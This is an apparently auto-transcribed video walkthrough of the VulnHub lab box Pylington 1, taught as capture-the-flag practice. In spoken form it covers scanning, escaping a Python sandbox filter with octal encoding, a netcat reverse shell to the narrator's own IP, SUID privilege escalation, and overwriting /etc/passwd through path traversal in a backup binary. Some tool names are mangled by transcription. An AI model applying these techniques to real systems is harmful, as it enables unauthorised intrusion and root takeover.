Yo, what's going on, guys? In this video, we're going to be doing Pylington 1 from VulnHub. I rate this box about a solid easy, and yeah, hope you guys enjoy. Alright, so as I get started, I'm actually going to open my terminals here. We can start by displaying these. So I'm going to run a net discover minus r 10.0.0.1/24/i820. We do get the IP of the box 10.0.0.209. Also, I'm running mmap scan on here and minus SC for default scripts, minus SV for enumeration, and then we'll scan all ports on the IP. I'm doing minus V for verbose, so we can see the ports as it does scan, right? We do see port 20 or port 22 for SSH, port 80 for HTTP, right? So let's visit the IP now. Looking at this, we do get a Pylington cloud. We can do Control U to view the source code. It doesn't seem like we do have anything. We do have a robots.txt, which is 3 disallowed entries. We do have register, login, and also this weird directory, right? So I'm gonna run a GoBuster. We'll do dir mode minus u HTTP. We'll do minus w for user share word list dirbuster. We'll do a directory list 2.3 medium.txt. We'll specify the extensions as HTML, TXT, and also PHP. Look at this, we do have index.html. We do have robots.txt login. So let's try to visit our /login. Or /login. We do get a username and password. Let's see if we can sign up. Doesn't seem like we can sign up. So next thing, let's check our robots.txt. It is telling us that we do have 3 disallowed entries. So let's try to visit this. We already do have register. We went to register and also login. Let's try to visit this here. This should be a directory. Looking at this, we do get a username and password. So let's try to sign in using this. Steve, we have a password as this. Put that in there. I'm not good at math, so I'm just gonna enter this in a math. I'll just enter math calc. I think this should solve it for us. We can enter a problem. -105, so we'll just enter that to -105. We can click sign in, save this. Welcome back, save. Let's click on this. Here we do have a super secret Python IDE. This online IDE is protected by no import OS, which is basically a sandbox. It's secure because it's only accepting. This way attackers won't be able to execute anything malicious, right? Okay, so usually when we're in a sandbox, let's first start by let's just copy this real quick. We'll just copy link location. We'll go into our VulnHub and see what this is about. We'll do mkdir as ply. So we'll wget this file. We'll vi into no import sandbox. So here it does seem like we do have a function. It is looking for import OS and open. So it's not allowing us to import or run OS or the open. Basically, they're just looking for these strings, right? So let's try to import OS. Let's see what happens. Run this. It does seem like we do get a hacker alert. Okay, so some of these, so in these sandboxes, I usually like running a exe like that, and then we can actually encode it using octal. Octal is the type of encoding that we can use. So let's go to CyberChef and try to convert this to octal, right? So we'll go to encryption and encoding. I think this was under, data format. Yeah, to octal, or was it? Oh, here it goes, to octal. Okay, so we're gonna actually encode this so it doesn't, so it filters out well, first we're going to import OS, and then we're going to execute a command, right? using Python, but we're actually gonna import it into Octal, so it bypasses, right? So we're gonna do import OS. We'll just do __ import, and we'll just do .system, and then we'll execute the command that we want here, which is ls. So basically, all we do is have __ import os.system. It's gonna execute this. So let's just copy this octal encoding. We'll put this in between there. So for this to work, we actually need to put some backslashes into this. So we'll just do a backslash between all this. Or let's see. So we put that in between each one. So now let's try to run this. If you run this, you do see that we do get we successfully ran the ls command, right? So next thing, we're actually going to use I'm pretty sure there is a netcat installed on here, so we're going to start a listener. We'll do all wrap netcat -lnvp on 4444. So between here, let's try to run our command, since we can run so basically, if we do Python 3, we import OS. We just do our os.system. We'll do a netcat. We'll just execute a bin /bash 10.0.069 4444. We'll split this. So basically, all we're doing is running this, a netcat between the os.system. We do this. We just get a connect, right? This is from my own machine, so I just wanted to demonstrate that. But we're just going to be doing that, right? So we'll just do netcat -e. We'll run a bin /bash. We'll do 10.0.069 on 4444. So it is a pretty big output, but it should get us a reverse shell, right? So we'll copy this, we'll put this into here. So we'll replace this. And we'll put this under here. So we'll just do the same thing now. We're almost done, so okay, so once we have that, this should give us a shell now. So let's actually we'll just close out of this. We'll start our listener. So we'll do all wrap netcat -lnvp on 4444. For the octal, I did specify my IP address, random bin bash on port 4444, right? So doing run, you do see that loads, and we do get we do ID, and now we are HTTP, right? So let's export our term. As you go to xterm, we can clear this. Let's spawn a TTY shell. So run a bin bash under here. And we are now HTTP, right? So let's go, well, the next thing we're going to be exporting is the SUID. So we'll just go search up a cheat sheet for, we'll do prevesc GitHub. This is not the cheat sheet I really use, so let's, so we'll search up SUID, and we have this one right here. Doesn't seem like we can run that, because I copied it wrong. And looking under here, we do get let me clear this. And doing this, we do get a SUID as home py typing. So we'll go down into cd/home. We do have a user as py. And we also do have a SUID as typing, right? So let's do typing. It's run typing. typing. So here it is telling us to just specify this right here, which is the input. We can just click that and we do get a password. So we'll switch users to py, press enter on that, and we are now just py, right? So we did have a couple of directories under here, which was secret stuff. So we'll go under secret stuff. Well, I'm actually just gonna X out of this. We'll SSH into py at 10.0.0.209. Did I not get the password? Yeah, I do have the password. Or was it? Yeah, we were SSH py at 10.0.0.029. Did I not get the right user? Run this. We'll just do Alice minus Sally on home. We'll SSH into py at 10.0.0.209. Okay, now it's working. Okay, that was weird, but so we'll do ls. We'll go into secret stuff. We do have a SUID for backup and also backup.cc. So we'll cd into backup.cc. So here we do see that this is not filtering any. This is not going to filter out any strings, right, that we put into this. And also it's not filtering the directories, right? It does show that it must be in SRV backups. But we can actually get a local file inclusion on here by executing, by overwriting a file, right? So I'll do mk password, we'll do -m for the method, we'll do SHA-512. We'll put this as password. I think I spelled that right. We do get this, so let's actually open this, we'll copy this, we'll put this in a text editor. For this we'll do, we'll specify the IDs. We'll do /root, or we'll do root /root, and we'll also run a /bin/bash. We'll make my own user as proxy. So we'll copy this. Let's try to run this. Let's see what it asks us. So backup. We want to enter our hash. Press on that, and we actually want to. You do see that this is going to SRV backups, but let's try to change directories. So we can do /. We'll do on2 because we're going to go back to our root directory, our home, or our file system, right? And we want to go to /etc/password. So now let's cat our /etc password, and you'll see that we have a proxy programmer there, right? So we'll switch users to proxy programmer. We'll do password, and now we are root alice, and we can cat our root.txt. And we can go to root, or we already in root, but there's our root.txt, right? Well, guys, that's pretty much in the video. Don't forget to like and subscribe, and I'll catch you guys in the next one. Peace.